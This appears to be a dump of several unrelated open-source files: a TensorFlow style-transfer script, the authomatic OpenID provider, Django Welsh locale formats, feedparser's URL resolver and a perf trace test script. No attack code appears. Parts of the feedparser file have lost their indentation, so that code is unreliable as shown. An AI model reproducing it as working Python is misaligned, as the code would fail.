                'vgg/dropout_1/random_uniform:0': [[1.0]],
                'vgg/dropout/random_uniform:0': [[1.0]]})
        style_layers = ['vgg/conv1_1/conv1_1:0',
                        'vgg/conv2_1/conv2_1:0',
                        'vgg/conv3_1/conv3_1:0',
                        'vgg/conv4_1/conv4_1:0',
                        'vgg/conv5_1/conv5_1:0']
        style_activations = []
        for style_i in style_layers:
            style_activation_i = g.get_tensor_by_name(style_i).eval(
                feed_dict={
                    x: style_img,
                    'vgg/dropout_1/random_uniform:0': [[1.0]],
                    'vgg/dropout/random_uniform:0': [[1.0]]})
            style_activations.append(style_activation_i)
        # Style targets are per-layer Gram matrices (normalized feature
        # co-occurrences) computed from the style activations.
        style_features = []
        for style_activation_i in style_activations:
            s_i = np.reshape(style_activation_i,
                             [-1, style_activation_i.shape[-1]])
            gram_matrix = np.matmul(s_i.T, s_i) / s_i.size
            style_features.append(gram_matrix.astype(np.float32))
    # Optimize both
    # Pass 2: rebuild the graph with a trainable input image mapped onto
    # VGG's input and minimize the weighted content + style losses.
    g = tf.Graph()
    with tf.Session(graph=g) as sess:
        net_input = tf.Variable(base_img)
        tf.import_graph_def(
            net['graph_def'],
            name='vgg',
            input_map={'images:0': net_input})
        content_loss = tf.nn.l2_loss((g.get_tensor_by_name(content_layer) -
                                     content_features) /
                                     content_features.size)
        style_loss = np.float32(0.0)
        for style_layer_i, style_gram_i in zip(style_layers, style_features):
            layer_i = g.get_tensor_by_name(style_layer_i)
            layer_shape = layer_i.get_shape().as_list()
            layer_size = layer_shape[1] * layer_shape[2] * layer_shape[3]
            layer_flat = tf.reshape(layer_i, [-1, layer_shape[3]])
            gram_matrix = tf.matmul(
                tf.transpose(layer_flat), layer_flat) / layer_size
            style_loss = tf.add(
                style_loss, tf.nn.l2_loss(
                    (gram_matrix - style_gram_i) /
                    np.float32(style_gram_i.size)))
        loss = content_weight * content_loss + style_weight * style_loss
        optimizer = tf.train.AdamOptimizer(0.01).minimize(loss)
        # NOTE(review): tf.initialize_all_variables() is the TF<1.0 API;
        # newer TF1 releases spell it tf.global_variables_initializer().
        sess.run(tf.initialize_all_variables())
        imgs = []
        for it_i in range(n_iterations):
            # Feed ones into both dropout masks so optimization is stable.
            _, this_loss, synth = sess.run(
                [optimizer, loss, net_input],
                feed_dict={
                    'vgg/dropout_1/random_uniform:0': np.ones(
                        g.get_tensor_by_name(
                            'vgg/dropout_1/random_uniform:0'
                        ).get_shape().as_list()),
                    'vgg/dropout/random_uniform:0': np.ones(
                        g.get_tensor_by_name(
                            'vgg/dropout/random_uniform:0'
                        ).get_shape().as_list())
                })
            print("iteration %d, loss: %f, range: (%f - %f)" %
                  (it_i, this_loss, np.min(synth), np.max(synth)), end='\r')
            if it_i % gif_step == 0:
                imgs.append(np.clip(synth[0], 0, 1))
        if saveto is not None:
            gif.build_gif(imgs, saveto=saveto)
    return np.clip(synth[0], 0, 1)
def warp_img(img, dx, dy):
    """Apply the motion vectors to the given image.

    Parameters
    ----------
    img : np.ndarray
        Input image to apply motion to (H x W x C).
    dx : np.ndarray
        H x W matrix defining the magnitude of the X vector
    dy : np.ndarray
        H x W matrix defining the magnitude of the Y vector

    Returns
    -------
    img : np.ndarray
        Image with pixels warped according to dx, dy.
    """
    warped = img.copy()
    n_rows, n_cols = img.shape[0], img.shape[1]
    for row_i in range(n_rows):
        for col_i in range(n_cols):
            dx_i = int(np.round(dx[row_i, col_i]))
            dy_i = int(np.round(dy[row_i, col_i]))
            # Clip x (column) offsets against the width and y (row) offsets
            # against the height.  The previous code swapped the two bounds,
            # which raised IndexError (or sampled the wrong pixels) on any
            # non-square image.
            sample_dx = np.clip(dx_i + col_i, 0, n_cols - 1)
            sample_dy = np.clip(dy_i + row_i, 0, n_rows - 1)
            warped[sample_dy, sample_dx, :] = img[row_i, col_i, :]
    return warped
def test_video(style_img='arles.jpg', videodir='kurosawa'):
    r"""Test for artistic stylization using video.
    This requires the python installation of OpenCV for the Deep Flow algorithm.
    If cv2 is not found, then there will be reduced "temporal coherence".
    Unfortunately, installing opencv for python3 is not the easiest thing to do.
    OSX users can install this using:
    $ brew install opencv --with-python3 --with-contrib
    then will have to symlink the libraries. I think you can do this w/:
    $ brew link --force opencv3
    But the problems start to arise depending on which python you have
    installed, and it is always a mess w/ homebrew. Sorry!
    Your best bet is installing from source. Something along
    these lines should get you there:
    $ cd ~
    $ git clone https://github.com/Itseez/opencv.git
    $ cd opencv
    $ git checkout 3.1.0
    $ cd ~
    $ git clone https://github.com/Itseez/opencv_contrib.git
    $ cd opencv_contrib
    $ git checkout 3.1.0
    $ cd ~/opencv
    $ mkdir build
    $ cd build
    $ cmake -D CMAKE_BUILD_TYPE=RELEASE \
        -D CMAKE_INSTALL_PREFIX=/usr/local \
        -D INSTALL_C_EXAMPLES=OFF \
        -D INSTALL_PYTHON_EXAMPLES=OFF \
        -D OPENCV_EXTRA_MODULES_PATH=~/opencv_contrib/modules \
        -D BUILD_EXAMPLES=OFF ..
    Parameters
    ----------
    style_img : str, optional
        Location to style image
    videodir : str, optional
        Location to directory containing images of each frame to stylize.
    Returns
    -------
    imgs : list of np.ndarray
        Stylized images for each frame.
    """
    # NOTE(review): only ImportError is caught here; if cv2 is installed
    # without the contrib optflow module, the attribute access below would
    # raise AttributeError instead -- TODO confirm.
    has_cv2 = True
    try:
        import cv2
        has_cv2 = True
        optflow = cv2.optflow.createOptFlow_DeepFlow()
    except ImportError:
        has_cv2 = False
    style_img = plt.imread(style_img)
    content_files = [os.path.join(videodir, f)
                     for f in os.listdir(videodir) if f.endswith('.png')]
    content_img = plt.imread(content_files[0])
    # NOTE(review): scipy.misc.imresize was removed in modern SciPy.
    from scipy.misc import imresize
    style_img = imresize(style_img, (448, 448)).astype(np.float32) / 255.0
    content_img = imresize(content_img, (448, 448)).astype(np.float32) / 255.0
    # Track a luminance channel for optical flow: HSV value plane with cv2,
    # otherwise a weighted RGB sum.
    if has_cv2:
        prev_lum = cv2.cvtColor(content_img, cv2.COLOR_RGB2HSV)[:, :, 2]
    else:
        prev_lum = (content_img[..., 0] * 0.3 +
                    content_img[..., 1] * 0.59 +
                    content_img[..., 2] * 0.11)
    imgs = []
    # Stylize the first frame from scratch ...
    stylized = stylize(content_img, style_img, content_weight=5.0,
                       style_weight=0.5, n_iterations=50)
    plt.imsave(fname=content_files[0] + 'stylized.png', arr=stylized)
    imgs.append(stylized)
    # ... then seed each subsequent frame with the previous stylization
    # warped by the estimated optical flow (when cv2 is available).
    for f in content_files[1:]:
        content_img = plt.imread(f)
        content_img = imresize(content_img, (448, 448)).astype(np.float32) / 255.0
        if has_cv2:
            lum = cv2.cvtColor(content_img, cv2.COLOR_RGB2HSV)[:, :, 2]
            flow = optflow.calc(prev_lum, lum, None)
            warped = warp_img(stylized, flow[..., 0], flow[..., 1])
            stylized = stylize(content_img, style_img, content_weight=5.0,
                               style_weight=0.5, base_img=warped, n_iterations=50)
        else:
            lum = (content_img[..., 0] * 0.3 +
                   content_img[..., 1] * 0.59 +
                   content_img[..., 2] * 0.11)
            stylized = stylize(content_img, style_img, content_weight=5.0,
                               style_weight=0.5, base_img=None, n_iterations=50)
        imgs.append(stylized)
        plt.imsave(fname=f + 'stylized.png', arr=stylized)
        prev_lum = lum
    return imgs
def test():
    """Test for artistic stylization."""
    # Downloads a Monet (style) and a Bosch (content) image from Wikimedia
    # and runs one stylization; network access is required.
    from six.moves import urllib
    f = ('https://upload.wikimedia.org/wikipedia/commons/thumb/5/54/' +
         'Claude_Monet%2C_Impression%2C_soleil_levant.jpg/617px-Claude_Monet' +
         '%2C_Impression%2C_soleil_levant.jpg?download')
    filepath, _ = urllib.request.urlretrieve(f, f.split('/')[-1], None)
    style = plt.imread(filepath)
    f = ('https://upload.wikimedia.org/wikipedia/commons/thumb/a/ae/' +
         'El_jard%C3%ADn_de_las_Delicias%2C_de_El_Bosco.jpg/640px-El_jard' +
         '%C3%ADn_de_las_Delicias%2C_de_El_Bosco.jpg')
    filepath, _ = urllib.request.urlretrieve(f, f.split('/')[-1], None)
    content = plt.imread(filepath)
    stylize(content, style)
# NOTE(review): the script entry point runs the video test, not test().
if __name__ == '__main__':
    test_video()
| apache-2.0 |
liorshahverdi/authomatic | authomatic/providers/openid.py | 14 | 17332 | # -*- coding: utf-8 -*-
"""
|openid| Providers
----------------------------------
Providers which implement the |openid|_ protocol based on the
`python-openid`_ library.
.. warning::
This providers are dependent on the |pyopenid|_ package.
.. autosummary::
OpenID
Yahoo
Google
"""
# We need absolute import to import from openid library which has the same name as this module
from __future__ import absolute_import
import datetime
import json
import logging
import pickle
import time
from openid import oidutil
from openid.consumer import consumer
from openid.extensions import ax, pape, sreg
from openid.association import Association
from openid.yadis.manager import YadisServiceManager
from openid.consumer.discover import OpenIDServiceEndpoint
from authomatic import providers
from authomatic.exceptions import FailureError, CancellationError, OpenIDError
__all__ = ['OpenID', 'Yahoo', 'Google']
# Suppress openid logging.
oidutil.log = lambda message, level=0: None
REALM_HTML = \
"""
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="X-XRDS-Location" content="{xrds_location}" />
</head>
<body>{body}</body>
</html>
"""
XRDS_XML = \
"""
<?xml version="1.0" encoding="UTF-8"?>
<xrds:XRDS
xmlns:xrds="xri://$xrds"
xmlns:openid="http://openid.net/xmlns/1.0"
xmlns="xri://$xrd*($v*2.0)">
<XRD>
<Service priority="1">
<Type>http://specs.openid.net/auth/2.0/return_to</Type>
<URI>{return_to}</URI>
</Service>
</XRD>
</xrds:XRDS>
"""
class SessionOpenIDStore(object):
    """
    A very primitive session-based implementation of the
    :class:`openid.store.interface.OpenIDStore` interface of the
    `python-openid`_ library.
    .. warning::
        Nonces get verified only by their timeout. Use on your own risk!
    """

    # Default no-op logger.  Wrapped in staticmethod because it is looked up
    # through instances (``self._log(level, message)``); a plain lambda
    # stored on the class would be bound and receive the instance as its
    # first argument, making every call raise TypeError.  Providers replace
    # it with a real logger (see OpenID.login).
    _log = staticmethod(lambda level, message: None)

    ASSOCIATION_KEY = ('authomatic.providers.openid.SessionOpenIDStore:'
                       'association')

    def __init__(self, session, nonce_timeout=None):
        """
        :param int nonce_timeout:
            Nonces older than this in seconds will be considered expired.
            Default is 600.
        """
        self.session = session
        self.nonce_timeout = nonce_timeout or 600

    def storeAssociation(self, server_url, association):
        """Serialize *association* and store it in the session."""
        self._log(logging.DEBUG,
                  'SessionOpenIDStore: Storing association to session.')
        serialized = association.serialize()
        decoded = serialized.decode('latin-1')
        # Always store only one association as a tuple.
        self.session[self.ASSOCIATION_KEY] = (server_url, association.handle,
                                              decoded)

    def getAssociation(self, server_url, handle=None):
        """Return the stored association for *server_url*, or None."""
        # Try to get association.
        assoc = self.session.get(self.ASSOCIATION_KEY)
        if assoc and assoc[0] == server_url:
            # If found deserialize and return it.
            self._log(logging.DEBUG, u'SessionOpenIDStore: Association found.')
            return Association.deserialize(assoc[2].encode('latin-1'))
        else:
            self._log(logging.DEBUG,
                      u'SessionOpenIDStore: Association not found.')

    def removeAssociation(self, server_url, handle):
        """Inform the caller that the association is gone.

        Fixed: the previous body was a bare ``True`` expression (a no-op),
        so the method implicitly returned None; it now returns True as the
        OpenIDStore interface expects.
        """
        return True

    def useNonce(self, server_url, timestamp, salt):
        """Return True when the nonce is younger than ``nonce_timeout``."""
        # Evaluate expired nonces as false.
        age = int(time.time()) - int(timestamp)
        if age < self.nonce_timeout:
            return True
        else:
            self._log(logging.ERROR, u'SessionOpenIDStore: Expired nonce!')
            return False
class OpenID(providers.AuthenticationProvider):
    """
    |openid|_ provider based on the `python-openid`_ library.
    """
    # Attribute Exchange schemas requested from the provider by default.
    AX = ['http://axschema.org/contact/email',
          'http://schema.openid.net/contact/email',
          'http://axschema.org/namePerson',
          'http://openid.net/schema/namePerson/first',
          'http://openid.net/schema/namePerson/last',
          'http://openid.net/schema/gender',
          'http://openid.net/schema/language/pref',
          'http://openid.net/schema/contact/web/default',
          'http://openid.net/schema/media/image',
          'http://openid.net/schema/timezone']
    AX_REQUIRED = ['http://schema.openid.net/contact/email']
    # Simple Registration fields requested by default.
    SREG = ['nickname',
            'email',
            'fullname',
            'dob',
            'gender',
            'postcode',
            'country',
            'language',
            'timezone']
    # PAPE authentication policies requested by default.
    PAPE = ['http://schemas.openid.net/pape/policies/2007/06/multi-factor-physical',
            'http://schemas.openid.net/pape/policies/2007/06/multi-factor',
            'http://schemas.openid.net/pape/policies/2007/06/phishing-resistant']
    def __init__(self, *args, **kwargs):
        """
        Accepts additional keyword arguments:
        :param store:
            Any object which implements :class:`openid.store.interface.OpenIDStore`
            of the `python-openid`_ library.
        :param bool use_realm:
            Whether to use `OpenID realm <http://openid.net/specs/openid-authentication-2_0-12.html#realms>`_.
            If ``True`` the realm HTML document will be accessible at
            ``{current url}?{realm_param}={realm_param}``
            e.g. ``http://example.com/path?realm=realm``.
        :param str realm_body:
            Contents of the HTML body tag of the realm.
        :param str realm_param:
            Name of the query parameter to be used to serve the realm.
        :param str xrds_param:
            The name of the query parameter to be used to serve the
            `XRDS document <http://openid.net/specs/openid-authentication-2_0-12.html#XRDS_Sample>`_.
        :param list sreg:
            List of strings of optional
            `SREG <http://openid.net/specs/openid-simple-registration-extension-1_0.html>`_ fields.
            Default = :attr:`OpenID.SREG`.
        :param list sreg_required:
            List of strings of required
            `SREG <http://openid.net/specs/openid-simple-registration-extension-1_0.html>`_ fields.
            Default = ``[]``.
        :param list ax:
            List of strings of optional
            `AX <http://openid.net/specs/openid-attribute-exchange-1_0.html>`_ schemas.
            Default = :attr:`OpenID.AX`.
        :param list ax_required:
            List of strings of required
            `AX <http://openid.net/specs/openid-attribute-exchange-1_0.html>`_ schemas.
            Default = :attr:`OpenID.AX_REQUIRED`.
        :param list pape:
            of requested
            `PAPE <http://openid.net/specs/openid-provider-authentication-policy-extension-1_0.html>`_
            policies.
            Default = :attr:`OpenID.PAPE`.
        As well as those inherited from :class:`.AuthenticationProvider` constructor.
        """
        super(OpenID, self).__init__(*args, **kwargs)
        # Allow for other openid store implementations.
        self.store = self._kwarg(kwargs, 'store', SessionOpenIDStore(self.session))
        # Realm
        self.use_realm = self._kwarg(kwargs, 'use_realm', True)
        self.realm_body = self._kwarg(kwargs, 'realm_body', '')
        self.realm_param = self._kwarg(kwargs, 'realm_param', 'realm')
        self.xrds_param = self._kwarg(kwargs, 'xrds_param', 'xrds')
        # SREG
        self.sreg = self._kwarg(kwargs, 'sreg', self.SREG)
        self.sreg_required = self._kwarg(kwargs, 'sreg_required', [])
        # AX
        self.ax = self._kwarg(kwargs, 'ax', self.AX)
        self.ax_required = self._kwarg(kwargs, 'ax_required', self.AX_REQUIRED)
        # add required schemas to schemas if not already there
        for i in self.ax_required:
            if i not in self.ax:
                self.ax.append(i)
        # PAPE
        self.pape = self._kwarg(kwargs, 'pape', self.PAPE)
    @staticmethod
    def _x_user_parser(user, data):
        # Populate the user object from the AX/SREG data collected during
        # login; SREG values win over AX where both are present.
        user.first_name = data.get('ax', {}).get('http://openid.net/schema/namePerson/first')
        user.last_name = data.get('ax', {}).get('http://openid.net/schema/namePerson/last')
        user.id = data.get('guid')
        user.link = data.get('ax', {}).get('http://openid.net/schema/contact/web/default')
        user.picture = data.get('ax', {}).get('http://openid.net/schema/media/image')
        user.nickname = data.get('sreg', {}).get('nickname')
        user.country = data.get('sreg', {}).get('country')
        user.postal_code = data.get('sreg', {}).get('postcode')
        user.name = data.get('sreg', {}).get('fullname') or \
            data.get('ax', {}).get('http://axschema.org/namePerson')
        user.gender = data.get('sreg', {}).get('gender') or \
            data.get('ax', {}).get('http://openid.net/schema/gender')
        user.locale = data.get('sreg', {}).get('language') or \
            data.get('ax', {}).get('http://openid.net/schema/language/pref')
        user.timezone = data.get('sreg', {}).get('timezone') or \
            data.get('ax', {}).get('http://openid.net/schema/timezone')
        user.email = data.get('sreg', {}).get('email') or \
            data.get('ax', {}).get('http://axschema.org/contact/email') or \
            data.get('ax', {}).get('http://schema.openid.net/contact/email')
        user.birth_date = datetime.datetime.strptime(data.get('sreg', {}).get('dob'), '%Y-%m-%d') if \
            data.get('sreg', {}).get('dob') else None
        return user
    @providers.login_decorator
    def login(self):
        # Instantiate consumer
        self.store._log = self._log
        oi_consumer = consumer.Consumer(self.session, self.store)
        # handle realm and XRDS if there is only one query parameter
        if self.use_realm and len(self.params) == 1:
            realm_request = self.params.get(self.realm_param)
            xrds_request = self.params.get(self.xrds_param)
        else:
            realm_request = None
            xrds_request = None
        # determine type of request
        if realm_request:
            #===================================================================
            # Realm HTML
            #===================================================================
            self._log(logging.INFO, u'Writing OpenID realm HTML to the response.')
            xrds_location = '{u}?{x}={x}'.format(u=self.url, x=self.xrds_param)
            self.write(REALM_HTML.format(xrds_location=xrds_location, body=self.realm_body))
        elif xrds_request:
            #===================================================================
            # XRDS XML
            #===================================================================
            self._log(logging.INFO, u'Writing XRDS XML document to the response.')
            self.set_header('Content-Type', 'application/xrds+xml')
            self.write(XRDS_XML.format(return_to=self.url))
        elif self.params.get('openid.mode'):
            #===================================================================
            # Phase 2 after redirect
            #===================================================================
            self._log(logging.INFO, u'Continuing OpenID authentication procedure after redirect.')
            # complete the authentication process
            response = oi_consumer.complete(self.params, self.url)
            # on success
            if response.status == consumer.SUCCESS:
                data = {}
                # get user ID
                data['guid'] = response.getDisplayIdentifier()
                self._log(logging.INFO, u'Authentication successful.')
                # get user data from AX response
                ax_response = ax.FetchResponse.fromSuccessResponse(response)
                if ax_response and ax_response.data:
                    self._log(logging.INFO, u'Got AX data.')
                    ax_data = {}
                    # convert iterable values to their first item
                    for k, v in ax_response.data.items():
                        if v and type(v) in (list, tuple):
                            ax_data[k] = v[0]
                    data['ax'] = ax_data
                # get user data from SREG response
                sreg_response = sreg.SRegResponse.fromSuccessResponse(response)
                if sreg_response and sreg_response.data:
                    self._log(logging.INFO, u'Got SREG data.')
                    data['sreg'] = sreg_response.data
                # get data from PAPE response
                pape_response = pape.Response.fromSuccessResponse(response)
                if pape_response and pape_response.auth_policies:
                    self._log(logging.INFO, u'Got PAPE data.')
                    data['pape'] = pape_response.auth_policies
                # create user
                self._update_or_create_user(data)
                #===============================================================
                # We're done!
                #===============================================================
            elif response.status == consumer.CANCEL:
                raise CancellationError(u'User cancelled the verification of ID "{0}"!'.format(response.getDisplayIdentifier()))
            elif response.status == consumer.FAILURE:
                raise FailureError(response.message)
        elif self.identifier: # As set in AuthenticationProvider.__init__
            #===================================================================
            # Phase 1 before redirect
            #===================================================================
            self._log(logging.INFO, u'Starting OpenID authentication procedure.')
            # get AuthRequest object
            try:
                auth_request = oi_consumer.begin(self.identifier)
            except consumer.DiscoveryFailure as e:
                # NOTE(review): e.message is a Python-2-only attribute.
                raise FailureError(u'Discovery failed for identifier {0}!'.format(self.identifier),
                                   url=self.identifier,
                                   original_message=e.message)
            self._log(logging.INFO, u'Service discovery for identifier {0} successful.'.format(self.identifier))
            # add SREG extension
            # we need to remove required fields from optional fields because addExtension then raises an error
            self.sreg = [i for i in self.sreg if i not in self.sreg_required]
            auth_request.addExtension(sreg.SRegRequest(optional=self.sreg,
                                                       required=self.sreg_required))
            # add AX extension
            ax_request = ax.FetchRequest()
            # set AX schemas
            for i in self.ax:
                required = i in self.ax_required
                ax_request.add(ax.AttrInfo(i, required=required))
            auth_request.addExtension(ax_request)
            # add PAPE extension
            auth_request.addExtension(pape.Request(self.pape))
            # prepare realm and return_to URLs
            if self.use_realm:
                realm = return_to = '{u}?{r}={r}'.format(u=self.url, r=self.realm_param)
            else:
                realm = return_to = self.url
            # NOTE(review): redirectURL is computed again inside the branch
            # below; this first call looks redundant.
            url = auth_request.redirectURL(realm, return_to)
            if auth_request.shouldSendRedirect():
                # can be redirected
                url = auth_request.redirectURL(realm, return_to)
                self._log(logging.INFO, u'Redirecting user to {0}.'.format(url))
                self.redirect(url)
            else:
                # must be sent as POST
                # this writes a html post form with auto-submit
                self._log(logging.INFO, u'Writing an auto-submit HTML form to the response.')
                form = auth_request.htmlMarkup(realm, return_to, False, dict(id='openid_form'))
                self.write(form)
        else:
            raise OpenIDError('No identifier specified!')
class Yahoo(OpenID):
    """
    Yahoo :class:`.OpenID` provider with the :attr:`.identifier` predefined to ``"me.yahoo.com"``.
    """
    # Predefined OpenID identifier for this provider.
    identifier = 'me.yahoo.com'
class Google(OpenID):
    """
    Google :class:`.OpenID` provider with the :attr:`.identifier` predefined to ``"https://www.google.com/accounts/o8/id"``.
    """
    # Predefined OpenID identifier for this provider.
    identifier = 'https://www.google.com/accounts/o8/id'
| mit |
hydrospanner/DForurm | DForurm/env/Lib/site-packages/django/conf/locale/cy/formats.py | 504 | 1822 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j F Y' # '25 Hydref 2006'
TIME_FORMAT = 'P' # '2:30 y.b.'
DATETIME_FORMAT = 'j F Y, P' # '25 Hydref 2006, 2:30 y.b.'
YEAR_MONTH_FORMAT = 'F Y' # 'Hydref 2006'
MONTH_DAY_FORMAT = 'j F' # '25 Hydref'
SHORT_DATE_FORMAT = 'd/m/Y' # '25/10/2006'
# 'P' renders a locale-style 12-hour time, as in the example below.
SHORT_DATETIME_FORMAT = 'd/m/Y P' # '25/10/2006 2:30 y.b.'
FIRST_DAY_OF_WEEK = 1 # 'Dydd Llun'
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = [
    '%d/%m/%Y', '%d/%m/%y', # '25/10/2006', '25/10/06'
]
DATETIME_INPUT_FORMATS = [
    '%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
    '%Y-%m-%d %H:%M:%S.%f', # '2006-10-25 14:30:59.000200'
    '%Y-%m-%d %H:%M', # '2006-10-25 14:30'
    '%Y-%m-%d', # '2006-10-25'
    '%d/%m/%Y %H:%M:%S', # '25/10/2006 14:30:59'
    '%d/%m/%Y %H:%M:%S.%f', # '25/10/2006 14:30:59.000200'
    '%d/%m/%Y %H:%M', # '25/10/2006 14:30'
    '%d/%m/%Y', # '25/10/2006'
    '%d/%m/%y %H:%M:%S', # '25/10/06 14:30:59'
    '%d/%m/%y %H:%M:%S.%f', # '25/10/06 14:30:59.000200'
    '%d/%m/%y %H:%M', # '25/10/06 14:30'
    '%d/%m/%y', # '25/10/06'
]
DECIMAL_SEPARATOR = '.'
THOUSAND_SEPARATOR = ','
NUMBER_GROUPING = 3
| mit |
CristianBB/SickRage | lib/feedparser/urls.py | 43 | 4592 | from __future__ import absolute_import, unicode_literals
import re
try:
import urllib.parse as urlparse
except ImportError:
import urlparse as urlparse
from .html import _BaseHTMLProcessor
# If you want feedparser to allow all URL schemes, set this to ()
# List culled from Python's urlparse documentation at:
#   http://docs.python.org/library/urlparse.html
# as well as from "URI scheme" at Wikipedia:
#   https://secure.wikimedia.org/wikipedia/en/wiki/URI_scheme
# Many more will likely need to be added!
# URIs whose scheme is not in this allowlist are rejected by
# _makeSafeAbsoluteURI below.
ACCEPTABLE_URI_SCHEMES = (
    'file', 'ftp', 'gopher', 'h323', 'hdl', 'http', 'https', 'imap', 'magnet',
    'mailto', 'mms', 'news', 'nntp', 'prospero', 'rsync', 'rtsp', 'rtspu',
    'sftp', 'shttp', 'sip', 'sips', 'snews', 'svn', 'svn+ssh', 'telnet',
    'wais',
    # Additional common-but-unofficial schemes
    'aim', 'callto', 'cvs', 'facetime', 'feed', 'git', 'gtalk', 'irc', 'ircs',
    'irc6', 'itms', 'mms', 'msnim', 'skype', 'ssh', 'smb', 'svn', 'ymsg',
)
# Uncomment to disable scheme filtering entirely:
#ACCEPTABLE_URI_SCHEMES = ()
_urifixer = re.compile('^([A-Za-z][A-Za-z0-9+-.]*://)(/*)(.*?)')
def _urljoin(base, uri):
uri = _urifixer.sub(r'\1\3', uri)
try:
uri = urlparse.urljoin(base, uri)
except ValueError:
uri = ''
return uri
def _convert_to_idn(url):
"""Convert a URL to IDN notation"""
# this function should only be called with a unicode string
# strategy: if the host cannot be encoded in ascii, then
# it'll be necessary to encode it in idn form
parts = list(urlparse.urlsplit(url))
try:
parts[1].encode('ascii')
except UnicodeEncodeError:
# the url needs to be converted to idn notation
host = parts[1].rsplit(':', 1)
newhost = []
port = ''
if len(host) == 2:
port = host.pop()
for h in host[0].split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
if port:
parts[1] += ':' + port
return urlparse.urlunsplit(parts)
else:
return url
def _makeSafeAbsoluteURI(base, rel=None):
    """Resolve *rel* against *base*, returning '' for disallowed schemes."""
    # bail if ACCEPTABLE_URI_SCHEMES is empty
    if not ACCEPTABLE_URI_SCHEMES:
        return _urljoin(base, rel or '')
    if not base:
        return rel or ''
    if not rel:
        # No relative part: validate the base URI's scheme on its own.
        try:
            scheme = urlparse.urlparse(base)[0]
        except ValueError:
            return ''
        if not scheme or scheme in ACCEPTABLE_URI_SCHEMES:
            return base
        return ''
    uri = _urljoin(base, rel)
    # Reject the joined result if its scheme is not on the allowlist.
    if uri.strip().split(':', 1)[0] not in ACCEPTABLE_URI_SCHEMES:
        return ''
    return uri
class _RelativeURIResolver(_BaseHTMLProcessor):
    # HTML processor that rewrites every URI-bearing attribute listed in
    # `relative_uris` to a safe absolute URI resolved against `baseuri`.
    relative_uris = set([('a', 'href'),
                         ('applet', 'codebase'),
                         ('area', 'href'),
                         ('audio', 'src'),
                         ('blockquote', 'cite'),
                         ('body', 'background'),
                         ('del', 'cite'),
                         ('form', 'action'),
                         ('frame', 'longdesc'),
                         ('frame', 'src'),
                         ('iframe', 'longdesc'),
                         ('iframe', 'src'),
                         ('head', 'profile'),
                         ('img', 'longdesc'),
                         ('img', 'src'),
                         ('img', 'usemap'),
                         ('input', 'src'),
                         ('input', 'usemap'),
                         ('ins', 'cite'),
                         ('link', 'href'),
                         ('object', 'classid'),
                         ('object', 'codebase'),
                         ('object', 'data'),
                         ('object', 'usemap'),
                         ('q', 'cite'),
                         ('script', 'src'),
                         ('source', 'src'),
                         ('video', 'poster'),
                         ('video', 'src')])
    def __init__(self, baseuri, encoding, _type):
        _BaseHTMLProcessor.__init__(self, encoding, _type)
        self.baseuri = baseuri
    def resolveURI(self, uri):
        # Delegates scheme filtering and joining to _makeSafeAbsoluteURI.
        return _makeSafeAbsoluteURI(self.baseuri, uri.strip())
    def unknown_starttag(self, tag, attrs):
        attrs = self.normalize_attrs(attrs)
        attrs = [(key, ((tag, key) in self.relative_uris) and self.resolveURI(value) or value) for key, value in attrs]
        _BaseHTMLProcessor.unknown_starttag(self, tag, attrs)
def _resolveRelativeURIs(htmlSource, baseURI, encoding, _type):
    """Return *htmlSource* with relative URIs resolved against *baseURI*."""
    # if not _SGML_AVAILABLE:
    #     return htmlSource
    p = _RelativeURIResolver(baseURI, encoding, _type)
    p.feed(htmlSource)
    return p.output()
| gpl-3.0 |
draekko/android_kernel_samsung_kylessopen | tools/perf/scripts/python/check-perf-trace.py | 11214 | 2503 | # perf script event handlers, generated by perf script -g python
# (c) 2010, Tom Zanussi <tzanussi@gmail.com>
# Licensed under the terms of the GNU GPL License version 2
#
# This script tests basic functionality such as flag and symbol
# strings, common_xxx() calls back into perf, begin, end, unhandled
# events, etc. Basically, if this script runs successfully and
# displays expected results, Python scripting support should be ok.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Core import *
from perf_trace_context import *
unhandled = autodict()
def trace_begin():
print "trace_begin"
pass
def trace_end():
	# Called once by perf after the last event: report unhandled event types.
	print_unhandled()
def irq__softirq_entry(event_name, context, common_cpu,
        common_secs, common_nsecs, common_pid, common_comm,
        vec):
    """Handler for the irq:softirq_entry tracepoint."""
    print_header(event_name, common_cpu, common_secs, common_nsecs,
        common_pid, common_comm)

    print_uncommon(context)

    # Trailing comma suppresses print's newline (Python 2 statement form).
    print "vec=%s\n" % \
        (symbol_str("irq__softirq_entry", "vec", vec)),
def kmem__kmalloc(event_name, context, common_cpu,
        common_secs, common_nsecs, common_pid, common_comm,
        call_site, ptr, bytes_req, bytes_alloc,
        gfp_flags):
    """Handler for the kmem:kmalloc tracepoint."""
    print_header(event_name, common_cpu, common_secs, common_nsecs,
        common_pid, common_comm)

    print_uncommon(context)

    # gfp_flags is decoded into symbolic flag names via perf's flag_str().
    print "call_site=%u, ptr=%u, bytes_req=%u, " \
        "bytes_alloc=%u, gfp_flags=%s\n" % \
        (call_site, ptr, bytes_req, bytes_alloc,
        flag_str("kmem__kmalloc", "gfp_flags", gfp_flags)),
def trace_unhandled(event_name, context, event_fields_dict):
    # Count events with no dedicated handler.  On first sight the fresh
    # autodict entry does not support "+= 1" (raises TypeError), which is
    # used here to initialise the counter instead.
    try:
        unhandled[event_name] += 1
    except TypeError:
        unhandled[event_name] = 1
def print_header(event_name, cpu, secs, nsecs, pid, comm):
    # One-line prefix shared by all handlers; the trailing comma keeps the
    # cursor on the same line for the event-specific fields that follow.
    print "%-20s %5u %05u.%09u %8u %-20s " % \
        (event_name, cpu, secs, nsecs, pid, comm),
# print trace fields not included in handler args
def print_uncommon(context):
    # common_pc/common_flags/common_lock_depth come from perf_trace_context.
    print "common_preempt_count=%d, common_flags=%s, common_lock_depth=%d, " \
        % (common_pc(context), trace_flag_str(common_flags(context)), \
        common_lock_depth(context))
def print_unhandled():
    """Print a table of event names seen without a handler, with counts."""
    keys = unhandled.keys()
    if not keys:
        return

    print "\nunhandled events:\n\n",

    print "%-40s  %10s\n" % ("event", "count"),
